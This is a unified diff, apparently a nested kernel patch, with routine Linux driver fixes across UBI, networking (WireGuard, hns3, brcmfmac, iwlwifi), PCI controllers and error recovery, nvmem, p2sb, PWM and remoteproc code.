+@@ -63,7 +63,7 @@
+ #define CMDRWGEN(cmd_dir, ran, bch, short_mode, page_size, pages)	\
+ 	(								\
+ 		(cmd_dir)			|			\
+-		((ran) << 19)			|			\
++		(ran)				|			\
+ 		((bch) << 14)			|			\
+ 		((short_mode) << 13)		|			\
+ 		(((page_size) & 0x7f) << 6)	|			\
+diff --git a/drivers/mtd/ubi/fastmap.c b/drivers/mtd/ubi/fastmap.c
+index ca2d9efe62c3c..1060e19205d2a 100644
+--- a/drivers/mtd/ubi/fastmap.c
++++ b/drivers/mtd/ubi/fastmap.c
+@@ -85,9 +85,10 @@ size_t ubi_calc_fm_size(struct ubi_device *ubi)
+ 		sizeof(struct ubi_fm_scan_pool) +
+ 		sizeof(struct ubi_fm_scan_pool) +
+ 		(ubi->peb_count * sizeof(struct ubi_fm_ec)) +
+-		(sizeof(struct ubi_fm_eba) +
+-		(ubi->peb_count * sizeof(__be32))) +
+-		sizeof(struct ubi_fm_volhdr) * UBI_MAX_VOLUMES;
++		((sizeof(struct ubi_fm_eba) +
++		  sizeof(struct ubi_fm_volhdr)) *
++		 (UBI_MAX_VOLUMES + UBI_INT_VOL_COUNT)) +
++		(ubi->peb_count * sizeof(__be32));
+ 	return roundup(size, ubi->leb_size);
+ }
+ 
+diff --git a/drivers/mtd/ubi/vtbl.c b/drivers/mtd/ubi/vtbl.c
+index f700f0e4f2ec4..6e5489e233dd2 100644
+--- a/drivers/mtd/ubi/vtbl.c
++++ b/drivers/mtd/ubi/vtbl.c
+@@ -791,6 +791,12 @@ int ubi_read_volume_table(struct ubi_device *ubi, struct ubi_attach_info *ai)
+ 	 * The number of supported volumes is limited by the eraseblock size
+ 	 * and by the UBI_MAX_VOLUMES constant.
+ 	 */
++
++	if (ubi->leb_size < UBI_VTBL_RECORD_SIZE) {
++		ubi_err(ubi, "LEB size too small for a volume record");
++		return -EINVAL;
++	}
++
+ 	ubi->vtbl_slots = ubi->leb_size / UBI_VTBL_RECORD_SIZE;
+ 	if (ubi->vtbl_slots > UBI_MAX_VOLUMES)
+ 		ubi->vtbl_slots = UBI_MAX_VOLUMES;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h
+index 8510b88d49820..f3cd5a376eca9 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h
+@@ -24,7 +24,7 @@ TRACE_EVENT(hclge_pf_mbx_get,
+ 		__field(u8, code)
+ 		__field(u8, subcode)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->vport[0].nic.kinfo.netdev->name)
++		__string(devname, hdev->vport[0].nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, PF_GET_MBX_LEN)
+ 	),
+ 
+@@ -33,7 +33,7 @@ TRACE_EVENT(hclge_pf_mbx_get,
+ 		__entry->code = req->msg.code;
+ 		__entry->subcode = req->msg.subcode;
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->vport[0].nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->vport[0].nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_vf_to_pf_cmd));
+ 	),
+@@ -56,7 +56,7 @@ TRACE_EVENT(hclge_pf_mbx_send,
+ 		__field(u8, vfid)
+ 		__field(u16, code)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->vport[0].nic.kinfo.netdev->name)
++		__string(devname, hdev->vport[0].nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, PF_SEND_MBX_LEN)
+ 	),
+ 
+@@ -64,7 +64,7 @@ TRACE_EVENT(hclge_pf_mbx_send,
+ 		__entry->vfid = req->dest_vfid;
+ 		__entry->code = le16_to_cpu(req->msg.code);
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->vport[0].nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->vport[0].nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_pf_to_vf_cmd));
+ 	),
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h
+index 5d4895bb57a17..b259e95dd53c2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h
+@@ -23,7 +23,7 @@ TRACE_EVENT(hclge_vf_mbx_get,
+ 		__field(u8, vfid)
+ 		__field(u16, code)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->nic.kinfo.netdev->name)
++		__string(devname, hdev->nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, VF_GET_MBX_LEN)
+ 	),
+ 
+@@ -31,7 +31,7 @@ TRACE_EVENT(hclge_vf_mbx_get,
+ 		__entry->vfid = req->dest_vfid;
+ 		__entry->code = le16_to_cpu(req->msg.code);
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_pf_to_vf_cmd));
+ 	),
+@@ -55,7 +55,7 @@ TRACE_EVENT(hclge_vf_mbx_send,
+ 		__field(u8, code)
+ 		__field(u8, subcode)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->nic.kinfo.netdev->name)
++		__string(devname, hdev->nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, VF_SEND_MBX_LEN)
+ 	),
+ 
+@@ -64,7 +64,7 @@ TRACE_EVENT(hclge_vf_mbx_send,
+ 		__entry->code = req->msg.code;
+ 		__entry->subcode = req->msg.subcode;
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_vf_to_pf_cmd));
+ 	),
+diff --git a/drivers/net/ethernet/xilinx/ll_temac_main.c b/drivers/net/ethernet/xilinx/ll_temac_main.c
+index 6bf5e341c3c11..08c45756b2181 100644
+--- a/drivers/net/ethernet/xilinx/ll_temac_main.c
++++ b/drivers/net/ethernet/xilinx/ll_temac_main.c
+@@ -1445,7 +1445,7 @@ static int temac_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* map device registers */
+-	lp->regs = devm_platform_ioremap_resource_byname(pdev, 0);
++	lp->regs = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(lp->regs)) {
+ 		dev_err(&pdev->dev, "could not map TEMAC registers\n");
+ 		return -ENOMEM;
+diff --git a/drivers/net/wireguard/netlink.c b/drivers/net/wireguard/netlink.c
+index 6d1bd9f52d02a..81b716e6612e2 100644
+--- a/drivers/net/wireguard/netlink.c
++++ b/drivers/net/wireguard/netlink.c
+@@ -164,8 +164,8 @@ get_peer(struct wg_peer *peer, struct sk_buff *skb, struct dump_ctx *ctx)
+ 	if (!allowedips_node)
+ 		goto no_allowedips;
+ 	if (!ctx->allowedips_seq)
+-		ctx->allowedips_seq = peer->device->peer_allowedips.seq;
+-	else if (ctx->allowedips_seq != peer->device->peer_allowedips.seq)
++		ctx->allowedips_seq = ctx->wg->peer_allowedips.seq;
++	else if (ctx->allowedips_seq != ctx->wg->peer_allowedips.seq)
+ 		goto no_allowedips;
+ 
+ 	allowedips_nest = nla_nest_start(skb, WGPEER_A_ALLOWEDIPS);
+@@ -255,17 +255,17 @@ static int wg_get_device_dump(struct sk_buff *skb, struct netlink_callback *cb)
+ 	if (!peers_nest)
+ 		goto out;
+ 	ret = 0;
+-	/* If the last cursor was removed via list_del_init in peer_remove, then
++	lockdep_assert_held(&wg->device_update_lock);
++	/* If the last cursor was removed in peer_remove or peer_remove_all, then
+ 	 * we just treat this the same as there being no more peers left. The
+ 	 * reason is that seq_nr should indicate to userspace that this isn't a
+ 	 * coherent dump anyway, so they'll try again.
+ 	 */
+ 	if (list_empty(&wg->peer_list) ||
+-	    (ctx->next_peer && list_empty(&ctx->next_peer->peer_list))) {
++	    (ctx->next_peer && ctx->next_peer->is_dead)) {
+ 		nla_nest_cancel(skb, peers_nest);
+ 		goto out;
+ 	}
+-	lockdep_assert_held(&wg->device_update_lock);
+ 	peer = list_prepare_entry(ctx->next_peer, &wg->peer_list, peer_list);
+ 	list_for_each_entry_continue(peer, &wg->peer_list, peer_list) {
+ 		if (get_peer(peer, skb, ctx)) {
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index ad5a8d61d9385..24a3d5a593f15 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -791,8 +791,7 @@ s32 brcmf_notify_escan_complete(struct brcmf_cfg80211_info *cfg,
+ 	scan_request = cfg->scan_request;
+ 	cfg->scan_request = NULL;
+ 
+-	if (timer_pending(&cfg->escan_timeout))
+-		del_timer_sync(&cfg->escan_timeout);
++	timer_delete_sync(&cfg->escan_timeout);
+ 
+ 	if (fw_abort) {
+ 		/* Do a scan abort to stop the driver's scan engine */
+@@ -7805,6 +7804,7 @@ void brcmf_cfg80211_detach(struct brcmf_cfg80211_info *cfg)
+ 	brcmf_btcoex_detach(cfg);
+ 	wiphy_unregister(cfg->wiphy);
+ 	wl_deinit_priv(cfg);
++	cancel_work_sync(&cfg->escan_timeout_work);
+ 	brcmf_free_wiphy(cfg->wiphy);
+ 	kfree(cfg);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index 3ef0b776b7727..3b0ed1cdfa11e 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -2903,8 +2903,6 @@ static void iwl_fw_dbg_collect_sync(struct iwl_fw_runtime *fwrt, u8 wk_idx)
+ 	struct iwl_fw_dbg_params params = {0};
+ 	struct iwl_fwrt_dump_data *dump_data =
+ 		&fwrt->dump.wks[wk_idx].dump_data;
+-	u32 policy;
+-	u32 time_point;
+ 	if (!test_bit(wk_idx, &fwrt->dump.active_wks))
+ 		return;
+ 
+@@ -2935,13 +2933,16 @@ static void iwl_fw_dbg_collect_sync(struct iwl_fw_runtime *fwrt, u8 wk_idx)
+ 
+ 	iwl_fw_dbg_stop_restart_recording(fwrt, &params, false);
+ 
+-	policy = le32_to_cpu(dump_data->trig->apply_policy);
+-	time_point = le32_to_cpu(dump_data->trig->time_point);
++	if (iwl_trans_dbg_ini_valid(fwrt->trans)) {
++		u32 policy = le32_to_cpu(dump_data->trig->apply_policy);
++		u32 time_point = le32_to_cpu(dump_data->trig->time_point);
+ 
+-	if (policy & IWL_FW_INI_APPLY_POLICY_DUMP_COMPLETE_CMD) {
+-		IWL_DEBUG_FW_INFO(fwrt, "WRT: sending dump complete\n");
+-		iwl_send_dbg_dump_complete_cmd(fwrt, time_point, 0);
++		if (policy & IWL_FW_INI_APPLY_POLICY_DUMP_COMPLETE_CMD) {
++			IWL_DEBUG_FW_INFO(fwrt, "WRT: sending dump complete\n");
++			iwl_send_dbg_dump_complete_cmd(fwrt, time_point, 0);
++		}
+ 	}
++
+ 	if (fwrt->trans->dbg.last_tp_resetfw == IWL_FW_INI_RESET_FW_MODE_STOP_FW_ONLY)
+ 		iwl_force_nmi(fwrt->trans);
+ 
+diff --git a/drivers/nvmem/meson-efuse.c b/drivers/nvmem/meson-efuse.c
+index d6b533497ce1a..ba2714bef8d0e 100644
+--- a/drivers/nvmem/meson-efuse.c
++++ b/drivers/nvmem/meson-efuse.c
+@@ -47,7 +47,6 @@ static int meson_efuse_probe(struct platform_device *pdev)
+ 	struct nvmem_config *econfig;
+ 	struct clk *clk;
+ 	unsigned int size;
+-	int ret;
+ 
+ 	sm_np = of_parse_phandle(pdev->dev.of_node, "secure-monitor", 0);
+ 	if (!sm_np) {
+@@ -60,27 +59,9 @@ static int meson_efuse_probe(struct platform_device *pdev)
+ 	if (!fw)
+ 		return -EPROBE_DEFER;
+ 
+-	clk = devm_clk_get(dev, NULL);
+-	if (IS_ERR(clk)) {
+-		ret = PTR_ERR(clk);
+-		if (ret != -EPROBE_DEFER)
+-			dev_err(dev, "failed to get efuse gate");
+-		return ret;
+-	}
+-
+-	ret = clk_prepare_enable(clk);
+-	if (ret) {
+-		dev_err(dev, "failed to enable gate");
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev,
+-				       (void(*)(void *))clk_disable_unprepare,
+-				       clk);
+-	if (ret) {
+-		dev_err(dev, "failed to add disable callback");
+-		return ret;
+-	}
++	clk = devm_clk_get_enabled(dev, NULL);
++	if (IS_ERR(clk))
++		return dev_err_probe(dev, PTR_ERR(clk), "failed to get efuse gate");
+ 
+ 	if (meson_sm_call(fw, SM_EFUSE_USER_MAX, &size, 0, 0, 0, 0, 0) < 0) {
+ 		dev_err(dev, "failed to get max user");
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 4086a7818981a..506d6d061d4cd 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -669,8 +669,13 @@ int dw_pcie_ep_init_complete(struct dw_pcie_ep *ep)
+ 		nbars = (reg & PCI_REBAR_CTRL_NBAR_MASK) >>
+ 			PCI_REBAR_CTRL_NBAR_SHIFT;
+ 
++		/*
++		 * PCIe r6.0, sec 7.8.6.2 require us to support at least one
++		 * size in the range from 1 MB to 512 GB. Advertise support
++		 * for 1 MB BAR size only.
++		 */
+ 		for (i = 0; i < nbars; i++, offset += PCI_REBAR_CTRL)
+-			dw_pcie_writel_dbi(pci, offset + PCI_REBAR_CAP, 0x0);
++			dw_pcie_writel_dbi(pci, offset + PCI_REBAR_CAP, BIT(4));
+ 	}
+ 
+ 	dw_pcie_setup(pci);
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 0ccd92faf078a..0bad23ec53ee8 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -50,6 +50,7 @@
+ #define PARF_SLV_ADDR_SPACE_SIZE		0x358
+ #define PARF_DEVICE_TYPE			0x1000
+ #define PARF_BDF_TO_SID_TABLE_N			0x2000
++#define PARF_BDF_TO_SID_CFG			0x2c00
+ 
+ /* ELBI registers */
+ #define ELBI_SYS_CTRL				0x04
+@@ -102,6 +103,9 @@
+ /* PARF_DEVICE_TYPE register fields */
+ #define DEVICE_TYPE_RC				0x4
+ 
++/* PARF_BDF_TO_SID_CFG fields */
++#define BDF_TO_SID_BYPASS			BIT(0)
++
+ /* ELBI_SYS_CTRL register fields */
+ #define ELBI_SYS_CTRL_LT_ENABLE			BIT(0)
+ 
+@@ -1312,6 +1316,82 @@ static void qcom_pcie_deinit_2_7_0(struct qcom_pcie *pcie)
+ 	regulator_bulk_disable(ARRAY_SIZE(res->supplies), res->supplies);
+ }
+ 
++static int qcom_pcie_config_sid_1_9_0(struct qcom_pcie *pcie)
++{
++	/* iommu map structure */
++	struct {
++		u32 bdf;
++		u32 phandle;
++		u32 smmu_sid;
++		u32 smmu_sid_len;
++	} *map;
++	void __iomem *bdf_to_sid_base = pcie->parf + PARF_BDF_TO_SID_TABLE_N;
++	struct device *dev = pcie->pci->dev;
++	u8 qcom_pcie_crc8_table[CRC8_TABLE_SIZE];
++	int i, nr_map, size = 0;
++	u32 smmu_sid_base;
++	u32 val;
++
++	of_get_property(dev->of_node, "iommu-map", &size);
++	if (!size)
++		return 0;
++
++	/* Enable BDF to SID translation by disabling bypass mode (default) */
++	val = readl(pcie->parf + PARF_BDF_TO_SID_CFG);
++	val &= ~BDF_TO_SID_BYPASS;
++	writel(val, pcie->parf + PARF_BDF_TO_SID_CFG);
++
++	map = kzalloc(size, GFP_KERNEL);
++	if (!map)
++		return -ENOMEM;
++
++	of_property_read_u32_array(dev->of_node, "iommu-map", (u32 *)map,
++				   size / sizeof(u32));
++
++	nr_map = size / (sizeof(*map));
++
++	crc8_populate_msb(qcom_pcie_crc8_table, QCOM_PCIE_CRC8_POLYNOMIAL);
++
++	/* Registers need to be zero out first */
++	memset_io(bdf_to_sid_base, 0, CRC8_TABLE_SIZE * sizeof(u32));
++
++	/* Extract the SMMU SID base from the first entry of iommu-map */
++	smmu_sid_base = map[0].smmu_sid;
++
++	/* Look for an available entry to hold the mapping */
++	for (i = 0; i < nr_map; i++) {
++		__be16 bdf_be = cpu_to_be16(map[i].bdf);
++		u32 val;
++		u8 hash;
++
++		hash = crc8(qcom_pcie_crc8_table, (u8 *)&bdf_be, sizeof(bdf_be), 0);
++
++		val = readl(bdf_to_sid_base + hash * sizeof(u32));
++
++		/* If the register is already populated, look for next available entry */
++		while (val) {
++			u8 current_hash = hash++;
++			u8 next_mask = 0xff;
++
++			/* If NEXT field is NULL then update it with next hash */
++			if (!(val & next_mask)) {
++				val |= (u32)hash;
++				writel(val, bdf_to_sid_base + current_hash * sizeof(u32));
++			}
++
++			val = readl(bdf_to_sid_base + hash * sizeof(u32));
++		}
++
++		/* BDF [31:16] | SID [15:8] | NEXT [7:0] */
++		val = map[i].bdf << 16 | (map[i].smmu_sid - smmu_sid_base) << 8 | 0;
++		writel(val, bdf_to_sid_base + hash * sizeof(u32));
++	}
++
++	kfree(map);
++
++	return 0;
++}
++
+ static int qcom_pcie_get_resources_2_9_0(struct qcom_pcie *pcie)
+ {
+ 	struct qcom_pcie_resources_2_9_0 *res = &pcie->res.v2_9_0;
+@@ -1429,77 +1509,6 @@ static int qcom_pcie_link_up(struct dw_pcie *pci)
+ 	return !!(val & PCI_EXP_LNKSTA_DLLLA);
+ }
+ 
+-static int qcom_pcie_config_sid_sm8250(struct qcom_pcie *pcie)
+-{
+-	/* iommu map structure */
+-	struct {
+-		u32 bdf;
+-		u32 phandle;
+-		u32 smmu_sid;
+-		u32 smmu_sid_len;
+-	} *map;
+-	void __iomem *bdf_to_sid_base = pcie->parf + PARF_BDF_TO_SID_TABLE_N;
+-	struct device *dev = pcie->pci->dev;
+-	u8 qcom_pcie_crc8_table[CRC8_TABLE_SIZE];
+-	int i, nr_map, size = 0;
+-	u32 smmu_sid_base;
+-
+-	of_get_property(dev->of_node, "iommu-map", &size);
+-	if (!size)
+-		return 0;
+-
+-	map = kzalloc(size, GFP_KERNEL);
+-	if (!map)
+-		return -ENOMEM;
+-
+-	of_property_read_u32_array(dev->of_node,
+-		"iommu-map", (u32 *)map, size / sizeof(u32));
+-
+-	nr_map = size / (sizeof(*map));
+-
+-	crc8_populate_msb(qcom_pcie_crc8_table, QCOM_PCIE_CRC8_POLYNOMIAL);
+-
+-	/* Registers need to be zero out first */
+-	memset_io(bdf_to_sid_base, 0, CRC8_TABLE_SIZE * sizeof(u32));
+-
+-	/* Extract the SMMU SID base from the first entry of iommu-map */
+-	smmu_sid_base = map[0].smmu_sid;
+-
+-	/* Look for an available entry to hold the mapping */
+-	for (i = 0; i < nr_map; i++) {
+-		__be16 bdf_be = cpu_to_be16(map[i].bdf);
+-		u32 val;
+-		u8 hash;
+-
+-		hash = crc8(qcom_pcie_crc8_table, (u8 *)&bdf_be, sizeof(bdf_be),
+-			0);
+-
+-		val = readl(bdf_to_sid_base + hash * sizeof(u32));
+-
+-		/* If the register is already populated, look for next available entry */
+-		while (val) {
+-			u8 current_hash = hash++;
+-			u8 next_mask = 0xff;
+-
+-			/* If NEXT field is NULL then update it with next hash */
+-			if (!(val & next_mask)) {
+-				val |= (u32)hash;
+-				writel(val, bdf_to_sid_base + current_hash * sizeof(u32));
+-			}
+-
+-			val = readl(bdf_to_sid_base + hash * sizeof(u32));
+-		}
+-
+-		/* BDF [31:16] | SID [15:8] | NEXT [7:0] */
+-		val = map[i].bdf << 16 | (map[i].smmu_sid - smmu_sid_base) << 8 | 0;
+-		writel(val, bdf_to_sid_base + hash * sizeof(u32));
+-	}
+-
+-	kfree(map);
+-
+-	return 0;
+-}
+-
+ static int qcom_pcie_host_init(struct dw_pcie_rp *pp)
+ {
+ 	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
+@@ -1616,7 +1625,7 @@ static const struct qcom_pcie_ops ops_1_9_0 = {
+ 	.init = qcom_pcie_init_2_7_0,
+ 	.deinit = qcom_pcie_deinit_2_7_0,
+ 	.ltssm_enable = qcom_pcie_2_3_2_ltssm_enable,
+-	.config_sid = qcom_pcie_config_sid_sm8250,
++	.config_sid = qcom_pcie_config_sid_1_9_0,
+ };
+ 
+ /* Qcom IP rev.: 2.9.0  Synopsys IP rev.: 5.00a */
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index 9693bab59bf7c..b36cbc9136ae1 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -49,6 +49,7 @@
+ #include <linux/refcount.h>
+ #include <linux/irqdomain.h>
+ #include <linux/acpi.h>
++#include <linux/sizes.h>
+ #include <asm/mshyperv.h>
+ 
+ /*
+@@ -465,7 +466,7 @@ struct pci_eject_response {
+ 	u32 status;
+ } __packed;
+ 
+-static int pci_ring_size = (4 * PAGE_SIZE);
++static int pci_ring_size = VMBUS_RING_SIZE(SZ_16K);
+ 
+ /*
+  * Driver specific state.
+diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
+index f47a3b10bf504..8dda3b205dfd0 100644
+--- a/drivers/pci/pci-driver.c
++++ b/drivers/pci/pci-driver.c
+@@ -473,6 +473,13 @@ static void pci_device_remove(struct device *dev)
+ 
+ 	if (drv->remove) {
+ 		pm_runtime_get_sync(dev);
++		/*
++		 * If the driver provides a .runtime_idle() callback and it has
++		 * started to run already, it may continue to run in parallel
++		 * with the code below, so wait until all of the runtime PM
++		 * activity has completed.
++		 */
++		pm_runtime_barrier(dev);
+ 		drv->remove(pci_dev);
+ 		pm_runtime_put_noidle(dev);
+ 	}
+diff --git a/drivers/pci/pcie/err.c b/drivers/pci/pcie/err.c
+index 59c90d04a609a..705893b5f7b09 100644
+--- a/drivers/pci/pcie/err.c
++++ b/drivers/pci/pcie/err.c
+@@ -13,6 +13,7 @@
+ #define dev_fmt(fmt) "AER: " fmt
+ 
+ #include <linux/pci.h>
++#include <linux/pm_runtime.h>
+ #include <linux/module.h>
+ #include <linux/kernel.h>
+ #include <linux/errno.h>
+@@ -85,6 +86,18 @@ static int report_error_detected(struct pci_dev *dev,
+ 	return 0;
+ }
+ 
++static int pci_pm_runtime_get_sync(struct pci_dev *pdev, void *data)
++{
++	pm_runtime_get_sync(&pdev->dev);
++	return 0;
++}
++
++static int pci_pm_runtime_put(struct pci_dev *pdev, void *data)
++{
++	pm_runtime_put(&pdev->dev);
++	return 0;
++}
++
+ static int report_frozen_detected(struct pci_dev *dev, void *data)
+ {
+ 	return report_error_detected(dev, pci_channel_io_frozen, data);
+@@ -207,6 +220,8 @@ pci_ers_result_t pcie_do_recovery(struct pci_dev *dev,
+ 	else
+ 		bridge = pci_upstream_bridge(dev);
+ 
++	pci_walk_bridge(bridge, pci_pm_runtime_get_sync, NULL);
++
+ 	pci_dbg(bridge, "broadcast error_detected message\n");
+ 	if (state == pci_channel_io_frozen) {
+ 		pci_walk_bridge(bridge, report_frozen_detected, &status);
+@@ -251,10 +266,15 @@ pci_ers_result_t pcie_do_recovery(struct pci_dev *dev,
+ 		pcie_clear_device_status(dev);
+ 		pci_aer_clear_nonfatal_status(dev);
+ 	}
++
++	pci_walk_bridge(bridge, pci_pm_runtime_put, NULL);
++
+ 	pci_info(bridge, "device recovery successful\n");
+ 	return status;
+ 
+ failed:
++	pci_walk_bridge(bridge, pci_pm_runtime_put, NULL);
++
+ 	pci_uevent_ers(bridge, PCI_ERS_RESULT_DISCONNECT);
+ 
+ 	/* TODO: Should kernel panic here? */
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index c175b70a984c6..289ba6902e41b 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -6078,6 +6078,8 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2b, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2d, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a2f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a31, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0xa73f, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0xa76e, dpc_log_size);
+ #endif
+ 
+ /*
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index 4d5b4071d47d5..dc22b1dd2c8ba 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -1518,6 +1518,19 @@ int tegra_xusb_padctl_get_usb3_companion(struct tegra_xusb_padctl *padctl,
+ }
+ EXPORT_SYMBOL_GPL(tegra_xusb_padctl_get_usb3_companion);
+ 
++int tegra_xusb_padctl_get_port_number(struct phy *phy)
++{
++	struct tegra_xusb_lane *lane;
++
++	if (!phy)
++		return -ENODEV;
++
++	lane = phy_get_drvdata(phy);
++
++	return lane->index;
++}
++EXPORT_SYMBOL_GPL(tegra_xusb_padctl_get_port_number);
++
+ MODULE_AUTHOR("Thierry Reding <treding@nvidia.com>");
+ MODULE_DESCRIPTION("Tegra XUSB Pad Controller driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/platform/x86/p2sb.c b/drivers/platform/x86/p2sb.c
+index 17cc4b45e0239..a64f56ddd4a44 100644
+--- a/drivers/platform/x86/p2sb.c
++++ b/drivers/platform/x86/p2sb.c
+@@ -20,9 +20,11 @@
+ #define P2SBC_HIDE		BIT(8)
+ 
+ #define P2SB_DEVFN_DEFAULT	PCI_DEVFN(31, 1)
++#define P2SB_DEVFN_GOLDMONT	PCI_DEVFN(13, 0)
++#define SPI_DEVFN_GOLDMONT	PCI_DEVFN(13, 2)
+ 
+ static const struct x86_cpu_id p2sb_cpu_ids[] = {
+-	X86_MATCH_INTEL_FAM6_MODEL(ATOM_GOLDMONT,	PCI_DEVFN(13, 0)),
++	X86_MATCH_INTEL_FAM6_MODEL(ATOM_GOLDMONT, P2SB_DEVFN_GOLDMONT),
+ 	{}
+ };
+ 
+@@ -98,21 +100,12 @@ static void p2sb_scan_and_cache_devfn(struct pci_bus *bus, unsigned int devfn)
+ 
+ static int p2sb_scan_and_cache(struct pci_bus *bus, unsigned int devfn)
+ {
+-	unsigned int slot, fn;
+-
+-	if (PCI_FUNC(devfn) == 0) {
+-		/*
+-		 * When function number of the P2SB device is zero, scan it and
+-		 * other function numbers, and if devices are available, cache
+-		 * their BAR0s.
+-		 */
+-		slot = PCI_SLOT(devfn);
+-		for (fn = 0; fn < NR_P2SB_RES_CACHE; fn++)
+-			p2sb_scan_and_cache_devfn(bus, PCI_DEVFN(slot, fn));
+-	} else {
+-		/* Scan the P2SB device and cache its BAR0 */
+-		p2sb_scan_and_cache_devfn(bus, devfn);
+-	}
++	/* Scan the P2SB device and cache its BAR0 */
++	p2sb_scan_and_cache_devfn(bus, devfn);
++
++	/* On Goldmont p2sb_bar() also gets called for the SPI controller */
++	if (devfn == P2SB_DEVFN_GOLDMONT)
++		p2sb_scan_and_cache_devfn(bus, SPI_DEVFN_GOLDMONT);
+ 
+ 	if (!p2sb_valid_resource(&p2sb_resources[PCI_FUNC(devfn)].res))
+ 		return -ENOENT;
+diff --git a/drivers/pwm/pwm-img.c b/drivers/pwm/pwm-img.c
+index 0fccf061ab958..8ce6c453adf07 100644
+--- a/drivers/pwm/pwm-img.c
++++ b/drivers/pwm/pwm-img.c
+@@ -289,9 +289,9 @@ static int img_pwm_probe(struct platform_device *pdev)
+ 		return PTR_ERR(imgchip->sys_clk);
+ 	}
+ 
+-	imgchip->pwm_clk = devm_clk_get(&pdev->dev, "imgchip");
++	imgchip->pwm_clk = devm_clk_get(&pdev->dev, "pwm");
+ 	if (IS_ERR(imgchip->pwm_clk)) {
+-		dev_err(&pdev->dev, "failed to get imgchip clock\n");
++		dev_err(&pdev->dev, "failed to get pwm clock\n");
+ 		return PTR_ERR(imgchip->pwm_clk);
+ 	}
+ 
+diff --git a/drivers/remoteproc/remoteproc_virtio.c b/drivers/remoteproc/remoteproc_virtio.c
+index 0e95525c11581..ab5e4f02ab225 100644
+--- a/drivers/remoteproc/remoteproc_virtio.c
++++ b/drivers/remoteproc/remoteproc_virtio.c
+@@ -351,6 +351,9 @@ static void rproc_virtio_dev_release(struct device *dev)
+ 
+ 	kfree(vdev);
+ 
++	of_reserved_mem_device_release(&rvdev->pdev->dev);
++	dma_release_coherent_memory(&rvdev->pdev->dev);
++
+ 	put_device(&rvdev->pdev->dev);
+ }
+ 
